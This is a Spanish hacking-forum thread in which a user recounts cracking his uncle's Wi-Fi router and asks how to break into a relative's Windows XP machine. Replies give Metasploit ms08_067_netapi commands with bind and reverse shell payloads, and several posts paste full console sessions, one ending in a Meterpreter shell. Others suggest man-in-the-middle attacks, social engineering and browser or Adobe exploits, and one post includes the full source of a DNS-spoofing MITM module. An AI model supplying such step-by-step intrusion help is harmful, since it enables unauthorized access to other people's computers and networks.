Hola
Bien este es mi problema, hice una a puesta con mi tio de que le entraria a su ordenador y tener el control del sistema.Yo uso Linux
Lo primero que ice fue petarle el router con aircrack-ng para poder tener conexion a su red y asi poder entrarle, luego me conecto a traves de dhclient vale pos me conecto y dhclient me dice 1 cosa asi
DHCPACK of 192.168.1.34 from 192.168.1.1
yo entiendo esto decirme si me confundo 192.168.1.34 es mi ip y 192.168.1.1 la suya no?
Ok voy a nmap y ago esto
nmap 192.168.1.1/24
me sale esto mas o menos
PORT STATE SERVICE
20/tcp open ftp
23/tcp open ssh
26/tcp open telnet
83/tcp open http
MAC Address: 00:2CXXXXXXXX
Ok y abajo otra cosa q es esto
Interesting ports on 192.168.1.32
PORT STATE SERVICE
6551/tcp open bittorrent-tracker
MAC Address: 00:16:XXXXXXXX <-------- otra mac creo q es mi primo q baja con el bittorrent y esta conectado ala red por wifi
Vale creo que ya e encontrado por donde entrar por bittorrent.
ok escaneo la ip 192.168.1.32 esta vez ago esto
nmap -O 192.168.1.32
Para saber q sistema usa on q ya lo sepa
Me pone q es windows xp SP2 O SP3
Ok hasta aki me e kedado que EXPLOIT LE TENGO Q LANZAR Y COMO CON METASPLOIT y si e hecho algo mal.
Gracias un saludo
Bien lo primero: 192.168.1.1 es la puerta de enlace, para que nos entendamos es la ip del router. Sobre el ataque siendo esa version de windows primero tendrias que probar a atacar el SMB. El foro esta plagado de post hablando sobre el asi que busca.
Deberias aprender por que funcionan las cosas y no solo como se hacen. Asi que almenos busca el exploit por que lo nombran en infinidad de post. Y no utilices mayusculas indiscriminadamente o te llamaran la atencion.
Si como te comentaron 192.168.1.1 es la puerta de enlace en este caso "el router".
En ese caso en nmap usa la opcion -A que de da informacion de la version del programa que escucha en esos puertos, apartide de ahi buscas vulnerabiliades en securityfocus
sobre el metasploit habria que ver si este tiene el exploit necesario para alguna vulnerabilidad.
Saludos
Mira mis POST en las secciones de Hacking Avanzado y Hacking Basico. Tambien podes guiarte con mis videos.
http://www.youtube.com/user/alex19910218
Edit: Te recomiendo que uses el Scanner Nessus. ;)
Saludos!
intenta exploits para los bugs mas conocidos de windows como ms08-067.
usa metasploit
el exploit es MSF se llama windows/smb/ms08_067_netapi
Hola
Use el exploit windows/smb/ms08_067_netapi pero cuando cargo el ataque con el commando exploit me dice error os digo los pasos que ago aver que ago mal:
use windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.32 <----------- es lo que me dio nmap de la vulnerabilidad de bittorrent
set PAYLOAD windows/shell/bind_tcp
show options
exploit
y me dice esto
- Started bind handler
[-] Exploit failed: The host (192.168.1.32:445) was unreachable.
- Exploit completed, but no session was created.
no funciona donde esta el error.
Un saludo
No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
Cita de: Masita en 7 Enero 2010, 18:31 PMNo soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.
cpu2 Mira.
[youtube=425,350]qqUkCz5BrD8[/youtube] | [youtube=425,350]oZ7BsWXiVuE[/youtube]
Saludos!
CitarNo soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
NOOOOOOOO...
Citar-] Exploit failed: The host (192.168.1.32:445) was unreachable.
en otras palabras, no tiene el puerto abierto..
intentas explotar una vulnerabilidad de samba en un puerto mal configurado de bittotrrent??
Pwned, como bien lo dijistes
Cita de: cpu2 en 3 Enero 2010, 18:19 PMPORT STATE SERVICE
6551/tcp open bittorrent-tracker
Como ves esta abierto el puerto
6551/tcp y el con el exploit
windows/smb/ms08_067_netapi debe de estar abierto el puerto
445Verificalo en el
RPORT
Cita de: Shell Root en 7 Enero 2010, 18:36 PM
Cita de: Masita en 7 Enero 2010, 18:31 PMNo soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.
Se que el payload es la accion y el rhost el host remoto si lo sabia, pero creia que tenias que declararlos uno despues del otro. Ya que dependiendo del payload tienes unas "options" u otras. Ademas no me habia fijado en el error en concreto mea culpa. :silbar:
cpu2 YOU'VE BEEN PWNED
(http://cdn0.knowyourmeme.com/i/7346/original/pwned4.jpg)
Gracais a todos por ayudarme y contestar tan rapido
Shell Root
Nada e visto los 2 videos los e probado y nada me dice lo mismo en el segunbdo video que haces un payload windows/shell/reverse_tcp, cuando metes el RHOST 192.168.0.3 es tu ip? por que yo puse la mia y nada no funciona alguna idea?
rokernault
Como le exploto una vulnerabilidad de samba en un puerto de bittorrent a eso de samba me suena a algo de linux aa vaya imagen as puesto tio jeje.
Un saludo
cpu2, a ver,
1.
RHOST= Host_Remoto;
LHOST= Host_Local
RPORT= Puerto_Remoto;
LPORT= Puerto_Local
2. El exploit que estas usando
windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
Cita de: cpu2 en 3 Enero 2010, 18:19 PMPORT STATE SERVICE
6551/tcp open bittorrent-tracker
Como ves esta abierto el puerto
6551/tcp y el con el exploit
windows/smb/ms08_067_netapi debe de estar abierto el puerto
445. Verificalo en el
RPORT con el comando
Show Options, aunque se puede cambiar el puerto, pero pfff nose...
Saludos!
samba
la he cagao..
http://en.wikipedia.org/wiki/Server_Message_Block
saludos
Shell Root mira es lo que me sale ami
use exploit/windows/smb/ms08_067_netapi <------------- ningun problema
show options
Module options:
Name Current Setting Required Description
--------- ------------------ ------------ -------------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Vale me sale eso por lo que e visto en el video todo igual
set RHOST 192.168.1.32
set payload windows/shell/bind_tcp
show options
Module options:
Name Current Setting Required Description
--------- ------------------ ------------ -------------
RHOST 192.168.132 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description
--------- ------------------ ------------ -------------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
LHOST 192.168.1.32 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
eso sale
exploit
* Started bind handler
[-] Exploit failed: The host (192.168.1.32:445) was unreachable.
* Exploit completed, but no session was created.
eso es mi caso alguna idea creo que lo ago bien?
Un saludo
1. Ingresando RHOST y LHOST iguales, WTF! No tiene problema, pero jajaja es raro, prefiero crearme tan siquiera una Maquina Virtual. :·P
2. Importante: La maquina a la que deseas ingresar con el exploit, no es vulnerable a ese exploit... xD
Cita de: Shell Root en 7 Enero 2010, 19:25 PM2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
Cita de: cpu2 en 3 Enero 2010, 18:19 PMPORT STATE SERVICE
6551/tcp open bittorrent-tracker
Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose...
Saludos!
Saludos!
CitarModule options:
Name Current Setting Required Description
--------- ------------------ ------------ -------------
RHOST 192.168.132 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description
--------- ------------------ ------------ -------------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
LHOST 192.168.1.32 no The target address
mira bien las ip..
da igual, la maquina no es vulnerable
Cita de: rockernault en 7 Enero 2010, 20:16 PMmira bien las ip..
No tiene nada que ver, mira.
Citar
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7808 updated 28 days hago (2009.12.10)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > exploit
- Started reverse handler on port 4444
- Automatically detecting the target...
- Fingerprint: Windows XP Service Pack 2 - lang:Spanish
- Selected Target: Windows XP SP2 Spanish (NX)
- Triggering the vulnerability...
- Sending stage (723456 bytes)
- Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:9121)[/b]
meterpreter >
Saludos!
Como es posible si NMAP me dice que es vulnerable a eso -.-
¿alguna idea? jaja
buena rockernalult me a pasao lo mismo que en la imagen jeje
Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.
Un saludo
Cita de: cpu2 en 7 Enero 2010, 20:44 PMComo es posible si NMAP me dice que es vulnerable a eso -.-
A ver Nmap te lanzo el puerto
6551/tcp bittorrent-tracker, No?
Ok, dentro de los parametros de ejecucion del Exploit
windows/smb/ms08_067_netapi, necesitas que esta abierto el puerto 445. Alguna duda, es simple... xD
Cita de: cpu2 en 7 Enero 2010, 20:44 PMShell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.
No te rindas... ;) . Nada es Imposible...
Saludos!
CitarNo tiene nada que ver, mira.
es cierto... :laugh:
haber si alguien me ayuda...
escaneo:
CitarStarting Nmap 5.00 ( http://nmap.org ) at 2010-02-21 23:21 ART
Interesting ports on 192.168.1.100:
Not shown: 996 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
2869/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds
haber si allguein me pude ayudar..
Citar
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 524 exploits - 246 auxiliary
+ -- --=[ 193 payloads - 23 encoders - 8 nops
=[ svn r8578 updated today (2010.02.21)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.100 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.100 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 192.168.1.102 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
- Started reverse handler on 192.168.1.102:4444
- Automatically detecting the target...
- Fingerprint: Windows XP Service Pack 3 - lang:Spanish
- Selected Target: Windows XP SP3 Spanish (NX)
- Triggering the vulnerability...
- Exploit completed, but no session was created.
A ver cpu2, por lo que se ve el ordenador de tu tio es vulnerable, busca por ahí si el bittorrent tiene alguna vulnerabilidad. Que esté el puerto de bittorrent abierto no quiere decir que puedas entrar por ahí. Seguramente tb tendrá parcheado el fallo de ms08_067netapi, por eso no te pirula el exploit; así que no hay na que rascar. Buscate otro metodo.
Que tal neuronass, veo que esta OPEN el microsoft-ds, pero para estár aun más seguros, intentad escanearlo con el Nessus!
togueter, WTF!
Citartogueter, WTF!
eso de plano es no saber..... +1
yo creo que el problema es que veis todo bajo el mismo punto de vista:
-Escaneo host en busca de puertos abiertos / servicios vulnerables
-Metasploit hace el resto por mi...
Qué pasa? que cuando queda parcheado un fallo TYPICAL pues se acaba el juego... hay mil cosas que pueds hacer, para empezar si un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas ), prueba con ingeniería social... algun tipo de java applet infection ( hay varios posts en este foro sobre ello ), prueba con las 3333 vulnerabilidades que han salido recientemente en productos Adobe ( acrobat reader ) o con las de iexplore ( aurora ) o con las de Firefox... hay muchos caminos y restringirse tan solo al metasploit es lo peor que pueds hacer.
un saludo!
...por eso he puesto "buscate otro metodo" refiriendome a que busque otra forma q no sea usar ese exploit.
si me he equivocado lo siento, no hace falta ser groseros, llevo poco tiempo en esto.
Citarsi un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas
que opinas Shell Root??
Cita de: rockernault en 24 Febrero 2010, 21:08 PMque opinas Shell Root??
:silbar:
Bueno, xD, ando de nuevo retirado, ocupaciones como
"Desarrollador de Software", quitan demasiado tiempo. Así, solo diré...
"Una vulnerabilidad es tan limitada como tu quieras que sea"
y... [
Ettercap] And [
Metasploit], hacen una gran pareja! :D
me referia a que es una tonteria... MiTM no es una vulnerabilidad...
podrias modificar los paquetes.. pero con que objeto???
Cita de: rockernault en 24 Febrero 2010, 21:26 PMme referia a que es una tonteria... MiTM no es una vulnerabilidad...
Es verdad... tan solo es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado...Tal vez si los paquetes fuesen
"Archivos", se modificarian por algun
PAYLOAD
PD: fakedns.rb, responde a cualquier consulta DNS con una respuesta falsa apuntando a una dirección IP específica.
##
# $Id: fakedns.rb 5540 2008-06-25 23:04:19Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'resolv'
module Msf
class Auxiliary::Server::MITM_FakeDNS < Msf::Auxiliary
include Auxiliary::Report
def initialize
super(
'Name' => 'MITM DNS Service',
'Version' => '$Revision: 5540 $',
'Description' => %q{
This hack of the metasploit fakedns.rb serves as a sort
of MITM DNS server. Requests are passed through to a real
DNS server, and the responses are modified before being
returned to the client, if they match regular expressions
set in FILENAME.
},
'Author' => ['ddz', 'hdm', 'Wesley McGrew <wesley@mcgrewsecurity.com>'],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Service' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction' => 'Service'
)
register_options(
[
OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]),
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 53 ]),
# W: Added in an option for a set of filters, took out the catchall TARGETHOST
OptAddress.new('REALDNS', [true,"Ask this server for answers",nil]),
OptString.new('FILENAME', [true,"File of ip,regex for filtering responses",nil])
], self.class)
end
def run
begin
fp = File.new(datastore['FILENAME'])
rescue
print_status "Could not open #{datastore['FILENAME']} for reading. Quitting."
return
end
mod_entries = []
while !fp.eof?
entry = fp.gets().chomp().split(',')
mod_entries.push([entry[0],Regexp.new(entry[1])])
end
@port = datastore['SRVPORT'].to_i
# MacOS X workaround
::Socket.do_not_reverse_lookup = true
@sock = ::UDPSocket.new()
@sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
@sock.bind(datastore['SRVHOST'], @port)
@run = true
Thread.new {
# Wrap in exception handler
begin
while @run
packet, addr = @sock.recvfrom(65535)
if (packet.length == 0)
break
end
request = Resolv::DNS::Message.decode(packet)
# W: Go ahead and send it to the real DNS server and
# get the response
sock2 = ::UDPSocket.new()
sock2.send(packet, 0, datastore['REALDNS'], 53) #datastore['REALDNS'], 53)
packet2, addr2 = sock2.recvfrom(65535)
sock2.close()
real_response = Resolv::DNS::Message.decode(packet2)
fake_response = Resolv::DNS::Message.new()
fake_response.qr = 1 # Recursion desired
fake_response.ra = 1 # Recursion available
fake_response.id = real_response.id
real_response.each_question { |name, typeclass|
fake_response.add_question(name, typeclass)
}
real_response.each_answer { |name, ttl, data|
replaced = false
mod_entries.each { |e|
if name.to_s =~ e[1]
case data.to_s
when /IN::A/
data = Resolv::DNS::Resource::IN::A.new(e[0])
replaced = true
when /IN::MX/
data = Resolv::DNS::Resource::IN::MX.new(10,Resolv::DNS::Name.create(e[0]))
replaced = true
when /IN::NS/
data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
replaced = true
when /IN::PTR/
# Do nothing
replaced = true
else
# Do nothing
replaced = true
end
end
break if replaced
}
fake_response.add_answer(name,ttl,data)
}
real_response.each_authority { |name, ttl, data|
mod_entries.each { |e|
if name.to_s =~ e[1]
data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
break
end
}
fake_response.add_authority(name,ttl,data)
}
response_packet = fake_response.encode()
@sock.send(response_packet, 0, addr[3], addr[1])
end
# Make sure the socket gets closed on exit
rescue ::Exception => e
print_error("fakedns: #{e.class} #{e} #{e.backtrace}")
ensure
@sock.close
end
}
end
end
end
Cita de: rockernault en 24 Febrero 2010, 21:26 PM
me referia a que es una tonteria... MiTM no es una vulnerabilidad...
podrias modificar los paquetes.. pero con que objeto???
jajaja, cierto cierto.... qué tontería esto de poder modificar los archivos que te bajes eh... mira que si alguien coge y te cambia tu crack.exe por virusaco.exe aisss que tonterías... xD
Un MiTM yo lo considero que es una vulnerabilidad, es una vulnerabilidad de ciertas configuraciones de las tablas cache ARP. Hace 1 año o asi unos investigadores consiguieron hacer un MiTM a una camara de vigilancia IP, pudiendo insertar el video que quisiesen, eso tambien lo ves una tonteria? jaja
si es capaz, de modificar los paquetes que un usuario se descarga tiene medio trabajo hecho...
que es eso de "ciertas configuraciones" ???
el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP
no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas..
y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo...
modificar paquetes??? hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc)
el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto...
y respecto a MSF... si te sirve, bien si no... tambn...
Cita de: rockernault en 26 Febrero 2010, 01:47 AM
que es eso de "ciertas configuraciones" ???
el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP
no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas..
y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo...
modificar paquetes??? hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc)
el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto...
y respecto a MSF... si te sirve, bien si no... tambn...
con ciertas configuraciones me refería exactamente a lo que tu has mencionado, se pueden configurar las tablas de manera estática evitando el ARP poisoning o de manera dinámica siendo vulnerable ( aun que no quieras aceptar ese término ).
modificar paquetes es una solucion perfectamente válida, quizá dificil de implementar, pero válida es xD
y venga... que modificarias en los paquetes???
nada de que es dificil.. si lo mencionaste es porque sabes hacerlo....